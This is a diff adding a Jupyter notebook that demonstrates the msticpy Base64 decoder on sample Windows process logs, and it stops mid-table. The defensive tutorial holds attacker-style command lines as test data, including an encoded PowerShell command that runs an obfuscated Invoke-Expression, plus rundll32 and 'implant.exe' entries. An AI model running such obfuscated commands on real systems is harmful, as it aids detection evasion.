+    "This module allows you to extract base64 encoded content from a string or columns of a Pandas DataFrame.\n",
+    "The library returns the following information:\n",
+    "- decoded string (if decodable to utf-8 or utf-16)\n",
+    "- hashes of the decoded segment (MD5, SHA1, SHA256)\n",
+    "- string of printable byte values (e.g. for submission to a disassembler)\n",
+    "- the detected decoded file type (limited)\n",
+    "\n",
+    "If the results of the decoding contain further encoded strings these will be decoded recursively. If the encoded string appears to be a zip, gzip or tar archive, the contents will be decompressed after decoding. In the case of zip and tar, the contents of the archive will also be checked for base64 encoded content and decoded/decompressed if possible.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "toc": true
+   },
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#Title:-msticpy---Base64-Decoder\" data-toc-modified-id=\"Title:-msticpy---Base64-Decoder-1\">Title: msticpy - Base64 Decoder</a></span><ul class=\"toc-item\"><li><span><a href=\"#Description:\" data-toc-modified-id=\"Description:-1.1\">Description:</a></span></li><li><span><a href=\"#Decoding-Base64-String\" data-toc-modified-id=\"Decoding-Base64-String-1.2\">Decoding Base64 String</a></span></li><li><span><a href=\"#Using-a-DataFrame-as-Input\" data-toc-modified-id=\"Using-a-DataFrame-as-Input-1.3\">Using a DataFrame as Input</a></span><ul class=\"toc-item\"><li><span><a href=\"#Notes\" data-toc-modified-id=\"Notes-1.3.1\">Notes</a></span></li></ul></li><li><span><a href=\"#Interpreting-the-DataFrame-output.\" data-toc-modified-id=\"Interpreting-the-DataFrame-output.-1.4\">Interpreting the DataFrame output.</a></span><ul class=\"toc-item\"><li><span><a href=\"#SourceIndex-column-allows-you-to-merge-the-results-with-the-input-DataFrame\" data-toc-modified-id=\"SourceIndex-column-allows-you-to-merge-the-results-with-the-input-DataFrame-1.4.1\">SourceIndex column allows you to merge the results with the input DataFrame</a></span></li></ul></li><li><span><a href=\"#Decoding-Nested-Base64/Archives\" data-toc-modified-id=\"Decoding-Nested-Base64/Archives-1.5\">Decoding Nested Base64/Archives</a></span></li><li><span><a href=\"#IPython-magic\" data-toc-modified-id=\"IPython-magic-1.6\">IPython magic</a></span></li><li><span><a href=\"#Pandas-Extension\" data-toc-modified-id=\"Pandas-Extension-1.7\">Pandas Extension</a></span></li><li><span><a href=\"#To-Do-Items\" data-toc-modified-id=\"To-Do-Items-1.8\">To-Do Items</a></span></li></ul></li></ul></div>"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.111019Z",
+     "start_time": "2020-02-06T01:06:45.189863Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "mpmagics\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "\n",
+    "from IPython.display import display\n",
+    "import pandas as pd\n",
+    "\n",
+    "# Import Base64 module\n",
+    "from msticpy.nbtools import *\n",
+    "from msticpy.sectools import *"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.128628Z",
+     "start_time": "2020-02-06T01:06:47.112010Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CommandLine</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>.\\reg  not /domain:everything that /sid:shines...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>.\\rundll32  /C 42424.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>.\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                         CommandLine\n",
+       "0                   .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe\n",
+       "1  .\\reg  not /domain:everything that /sid:shines...\n",
+       "2                 cmd  /c \"systeminfo && systeminfo\"\n",
+       "3                           .\\rundll32  /C 42424.exe\n",
+       "4       .\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe"
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Load test data\n",
+    "process_tree = pd.read_csv('data/process_tree.csv',\n",
+    "                           parse_dates=[\"TimeGenerated\"],\n",
+    "                           infer_datetime_format=True)\n",
+    "process_tree[['CommandLine']].head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='decoding_string'></a>[Contents](#contents)\n",
+    "## Decoding Base64 String\n",
+    "\n",
+    "Base64 decode an input string.\n",
+    "\n",
+    "```\n",
+    "    Base64 decode an input string.\n",
+    "\n",
+    "    Parameters\n",
+    "    ----------\n",
+    "    input_string : str, optional\n",
+    "        single string to decode (the default is None)\n",
+    "    trace : bool, optional\n",
+    "        Show additional status (the default is None)\n",
+    "\n",
+    "    Returns\n",
+    "    -------\n",
+    "    Tuple[str, Optional[List[BinaryRecord]]]\n",
+    "        Decoded string and additional metadata\n",
+    "\n",
+    "    Notes\n",
+    "    -----\n",
+    "    Items that decode to utf-8 or utf-16 strings will be returned as decoded\n",
+    "    strings replaced in the original string. If the encoded string is a\n",
+    "    known binary type it will identify the file type and return the hashes\n",
+    "    of the file. If any binary types are known archives (zip, tar, gzip) it\n",
+    "    will unpack the contents of the archive.\n",
+    "    For any binary it will return the decoded file as a byte array, and as a\n",
+    "    printable list of byte values. If the input is a string the function\n",
+    "    returns:\n",
+    "\n",
+    "    - decoded string: this is the input string with any decoded sections\n",
+    "      replaced by the results of the decoding\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.142805Z",
+     "start_time": "2020-02-06T01:06:47.129618Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'.\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA'"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# get a commandline from our data set\n",
+    "cmdline = process_tree['CommandLine'].loc[39]\n",
+    "cmdline"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.161188Z",
+     "start_time": "2020-02-06T01:06:47.143800Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "(\".\\\\powershell  -enc <decoded type='string' name='[None]' index='1' depth='1'>$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x00'\\x00;\\x00\\r\\x00\\n\\x00&\\x00 \\x00(\\x00'\\x00I\\x00n\\x00v\\x00o\\x00k\\x00e\\x00'\\x00+\\x00'\\x00-\\x00E\\x00x\\x00p\\x00r\\x00e\\x00s\\x00s\\x00i\\x00o\\x00n\\x00'\\x00)\\x00 \\x00$\\x00t\\x00</decoded>\",    reference                                    original_string file_name  \\\n",
+      "0  (, 1., 1)  JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAE...   unknown   \n",
+      "\n",
+      "  file_type                                        input_bytes  \\\n",
+      "0      None  b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x0...   \n",
+      "\n",
+      "                                      decoded_string encoding_type  \\\n",
+      "0  $\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000...         utf-8   \n",
+      "\n",
+      "                                         file_hashes  \\\n",
+      "0  {'md5': '6cd1486db221e532cc2011c9beeb4ffc', 's...   \n",
+      "\n",
+      "                                md5                                      sha1  \\\n",
+      "0  6cd1486db221e532cc2011c9beeb4ffc  6e485467d7e06502046b7c84a8ef067cfe1512ad   \n",
+      "\n",
+      "                                              sha256  \\\n",
+      "0  d3291dab1ae552b91e6b50d7460ceaa39f6f92b2cda433...   \n",
+      "\n",
+      "                                     printable_bytes  \n",
+      "0  24 00 74 00 20 00 3d 00 20 00 27 00 64 00 69 0...  )\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Decode the string\n",
+    "base64_dec_str = base64.unpack(input_string=cmdline)\n",
+    "\n",
+    "# Print decoded string\n",
+    "print(base64_dec_str)\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='dataframeinput'></a>[Contents](#toc)\n",
+    "## Using a DataFrame as Input\n",
+    "You can replace to base64.unpack_df() to pass a DataFrame as an argument.\n",
+    "Use the ```column``` parameter to specify which column to process.\n",
+    "\n",
+    "In the case of DataFrame input, the output DataFrame contains these additional columns:\n",
+    " - src_index - the index of the row in the input dataframe from which the data came.\n",
+    " - full_decoded_string - the full decoded string with any decoded replacements. This is only really useful for top-level items, since nested items will only show the 'full' string representing the child fragment.\n",
+    "\n",
+    "```\n",
+    "Base64 decode strings taken from a pandas dataframe.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "data : pd.DataFrame\n",
+    "    dataframe containing column to decode\n",
+    "column : str\n",
+    "    Name of dataframe text column\n",
+    "trace : bool, optional\n",
+    "    Show additional status (the default is None)\n",
+    "\n",
+    "Returns\n",
+    "-------\n",
+    "pd.DataFrame\n",
+    "    Decoded string and additional metadata in dataframe\n",
+    "```\n",
+    "\n",
+    "### Notes\n",
+    "\n",
+    "Items that decode to utf-8 or utf-16 strings will be returned as decoded\n",
+    "strings replaced in the original string. If the encoded string is a\n",
+    "known binary type it will identify the file type and return the hashes\n",
+    "of the file. If any binary types are known archives (zip, tar, gzip) it\n",
+    "will unpack the contents of the archive.\n",
+    "For any binary it will return the decoded file as a byte array, and as a\n",
+    "printable list of byte values."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.222153Z",
+     "start_time": "2020-02-06T01:06:47.162187Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>reference</th>\n",
+       "      <th>original_string</th>\n",
+       "      <th>file_name</th>\n",
+       "      <th>file_type</th>\n",
+       "      <th>input_bytes</th>\n",
+       "      <th>decoded_string</th>\n",
+       "      <th>encoding_type</th>\n",
+       "      <th>file_hashes</th>\n",
+       "      <th>md5</th>\n",
+       "      <th>sha1</th>\n",
+       "      <th>sha256</th>\n",
+       "      <th>printable_bytes</th>\n",
+       "      <th>src_index</th>\n",
+       "      <th>full_decoded_string</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAE...</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x0...</td>\n",
+       "      <td>$\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&amp;\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000...</td>\n",
+       "      <td>utf-8</td>\n",
+       "      <td>{'md5': '6cd1486db221e532cc2011c9beeb4ffc', 's...</td>\n",
+       "      <td>6cd1486db221e532cc2011c9beeb4ffc</td>\n",
+       "      <td>6e485467d7e06502046b7c84a8ef067cfe1512ad</td>\n",
+       "      <td>d3291dab1ae552b91e6b50d7460ceaa39f6f92b2cda433...</td>\n",
+       "      <td>24 00 74 00 20 00 3d 00 20 00 27 00 64 00 69 0...</td>\n",
+       "      <td>39</td>\n",
+       "      <td>.\\powershell  -enc &lt;decoded type='string' name...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...</td>\n",
+       "      <td>9a45b2520e930dc9186f6d93a7798a13</td>\n",
+       "      <td>f526c90fa0744e3a63d84421ff25e3f5a3d697cb</td>\n",
+       "      <td>c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...</td>\n",
+       "      <td>69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...</td>\n",
+       "      <td>40</td>\n",
+       "      <td>cmd  /c \"echo # &lt;decoded value='binary'  name=...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...</td>\n",
+       "      <td>9a45b2520e930dc9186f6d93a7798a13</td>\n",
+       "      <td>f526c90fa0744e3a63d84421ff25e3f5a3d697cb</td>\n",
+       "      <td>c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...</td>\n",
+       "      <td>69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...</td>\n",
+       "      <td>41</td>\n",
+       "      <td>cmd  /c \"echo # &lt;decoded value='binary'  name=...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b'\\xf3W\\x9d\\xd3w\\x1a\\x7f\\xaft\\xd5\\xee8\\xe1\\xce...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '1c8cc6299bd654bbcd85710968d6a87c', 's...</td>\n",
+       "      <td>1c8cc6299bd654bbcd85710968d6a87c</td>\n",
+       "      <td>55377391141f59a2ff5ae4765d9f0b4438adfd73</td>\n",
+       "      <td>fd80ceba7cfb49d296886c10d9a3497d63c89a589587cd...</td>\n",
+       "      <td>f3 57 9d d3 77 1a 7f af 74 d5 ee 38 e1 ce f6 6...</td>\n",
+       "      <td>44</td>\n",
+       "      <td>implant.exe  &lt;decoded value='binary'  name='[N...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   reference                                    original_string file_name  \\\n",
+       "0  (, 1., 1)  JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAE...   unknown   \n",
+       "1  (, 1., 1)                   aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   unknown   \n",
+       "2  (, 1., 1)                   aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   unknown   \n",
+       "3  (, 1., 1)                   81ed03caf6901e444c72ac67d192fb9c   unknown   \n",
+       "\n",
+       "  file_type                                        input_bytes  \\\n",
+       "0      None  b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x0...   \n",
+       "1      None  b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...   \n",
+       "2      None  b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...   \n",
+       "3      None  b'\\xf3W\\x9d\\xd3w\\x1a\\x7f\\xaft\\xd5\\xee8\\xe1\\xce...   \n",
+       "\n",
+       "                                      decoded_string encoding_type  \\\n",
+       "0  $\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000...         utf-8   \n",
+       "1                                               None        binary   \n",
+       "2                                               None        binary   \n",
+       "3                                               None        binary   \n",
+       "\n",
+       "                                         file_hashes  \\\n",
+       "0  {'md5': '6cd1486db221e532cc2011c9beeb4ffc', 's...   \n",
+       "1  {'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...   \n",
+       "2  {'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...   \n",
+       "3  {'md5': '1c8cc6299bd654bbcd85710968d6a87c', 's...   \n",
+       "\n",
+       "                                md5                                      sha1  \\\n",
+       "0  6cd1486db221e532cc2011c9beeb4ffc  6e485467d7e06502046b7c84a8ef067cfe1512ad   \n",
+       "1  9a45b2520e930dc9186f6d93a7798a13  f526c90fa0744e3a63d84421ff25e3f5a3d697cb   \n",
+       "2  9a45b2520e930dc9186f6d93a7798a13  f526c90fa0744e3a63d84421ff25e3f5a3d697cb   \n",
+       "3  1c8cc6299bd654bbcd85710968d6a87c  55377391141f59a2ff5ae4765d9f0b4438adfd73   \n",
+       "\n",
+       "                                              sha256  \\\n",
+       "0  d3291dab1ae552b91e6b50d7460ceaa39f6f92b2cda433...   \n",
+       "1  c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...   \n",
+       "2  c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...   \n",
+       "3  fd80ceba7cfb49d296886c10d9a3497d63c89a589587cd...   \n",
+       "\n",
+       "                                     printable_bytes  src_index  \\\n",
+       "0  24 00 74 00 20 00 3d 00 20 00 27 00 64 00 69 0...         39   \n",
+       "1  69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...         40   \n",
+       "2  69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...         41   \n",
+       "3  f3 57 9d d3 77 1a 7f af 74 d5 ee 38 e1 ce f6 6...         44   \n",
+       "\n",
+       "                                 full_decoded_string  \n",
+       "0  .\\powershell  -enc <decoded type='string' name...  \n",
+       "1  cmd  /c \"echo # <decoded value='binary'  name=...  \n",
+       "2  cmd  /c \"echo # <decoded value='binary'  name=...  \n",
+       "3  implant.exe  <decoded value='binary'  name='[N...  "
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# specify the data and column parameters\n",
+    "dec_df = base64.unpack_df(data=process_tree, column='CommandLine')\n",
+    "dec_df"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='dataframe_colums'></a>[Contents](#contents)\n",
+    "## Interpreting the DataFrame output.\n",
+    "For simple strings the Base64 decoded output is straightforward. However for nested encodings this can get a little complex and difficult to represent in a tabular format.\n",
+    "\n",
+    "**Columns**\n",
+    " - reference - The index of the row item in dotted notation in depth.seq pairs (e.g. 1.2.2.3 would be the 3 item at depth 3 that is a child of the 2nd item found at depth 1). This may not always be an accurate notation - it is mainly use to allow you to associate an individual row with the reference value contained in the full_decoded_string column of the topmost item).\n",
+    " - original_string - the original string before decoding.\n",
+    " - file_name - filename, if any (only if this is an item in zip or tar file).\n",
+    " - file_type - a guess at the file type (this is currently elementary and only includes a few file types).\n",
+    " - input_bytes - the decoded bytes as a Python bytes string.\n",
+    " - decoded_string - the decoded string if it can be decoded as a UTF-8 or UTF-16 string. Note: binary sequences may often successfully decode as UTF-16 strings but, in these cases, the decodings are meaningless.\n",
+    " - encoding_type - encoding type (UTF-8 or UTF-16) if a decoding was possible, otherwise 'binary'.\n",
+    " - file_hashes - collection of file hashes for any decoded item.\n",
+    " - md5 - md5 hash as a separate column.\n",
+    " - sha1 - sha1 hash as a separate column.\n",
+    " - sha256 - sha256 hash as a separate column.\n",
+    " - printable_bytes - printable version of input_bytes as a string of \\xNN values\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='mergeresults'></a>[Contents](#contents)\n",
+    "### SourceIndex column allows you to merge the results with the input DataFrame\n",
+    "Where an input row has multiple decoded elements (e.g. a nested encoding or a zip or other archive file), the output of this merge will result in duplicate rows from the input (one per element match). The DataFrame index from the source is preserved in the `src_index` column.\n",
+    "\n",
+    "Note: you may need to force the type of the `src_index` column to be the same type as the original DataFrame in order to merge. In the example below case we are matching with the default numeric index so we force the type to be numeric. In cases where you are using an index of a different dtype you will need to convert the `src_index` (dtype=object) to match the type of your index column."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.258155Z",
+     "start_time": "2020-02-06T01:06:47.223152Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>input_bytes</th>\n",
+       "      <th>decoded_string</th>\n",
+       "      <th>encoding_type</th>\n",
+       "      <th>file_hashes</th>\n",
+       "      <th>md5</th>\n",
+       "      <th>sha1</th>\n",
+       "      <th>sha256</th>\n",
+       "      <th>printable_bytes</th>\n",
+       "      <th>src_index</th>\n",
+       "      <th>full_decoded_string</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SourceIndex</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>39</th>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:13.567</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x1684</td>\n",
+       "      <td>...</td>\n",
+       "      <td>b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x0...</td>\n",
+       "      <td>$\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&amp;\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000...</td>\n",
+       "      <td>utf-8</td>\n",
+       "      <td>{'md5': '6cd1486db221e532cc2011c9beeb4ffc', 's...</td>\n",
+       "      <td>6cd1486db221e532cc2011c9beeb4ffc</td>\n",
+       "      <td>6e485467d7e06502046b7c84a8ef067cfe1512ad</td>\n",
+       "      <td>d3291dab1ae552b91e6b50d7460ceaa39f6f92b2cda433...</td>\n",
+       "      <td>24 00 74 00 20 00 3d 00 20 00 27 00 64 00 69 0...</td>\n",
+       "      <td>39.0</td>\n",
+       "      <td>.\\powershell  -enc &lt;decoded type='string' name...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>40</th>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:13.683</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x16b8</td>\n",
+       "      <td>...</td>\n",
+       "      <td>b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...</td>\n",
+       "      <td>9a45b2520e930dc9186f6d93a7798a13</td>\n",
+       "      <td>f526c90fa0744e3a63d84421ff25e3f5a3d697cb</td>\n",
+       "      <td>c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...</td>\n",
+       "      <td>69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...</td>\n",
+       "      <td>40.0</td>\n",
+       "      <td>cmd  /c \"echo # &lt;decoded value='binary'  name=...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>41</th>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:13.793</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x16ec</td>\n",
+       "      <td>...</td>\n",
+       "      <td>b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...</td>\n",
+       "      <td>9a45b2520e930dc9186f6d93a7798a13</td>\n",
+       "      <td>f526c90fa0744e3a63d84421ff25e3f5a3d697cb</td>\n",
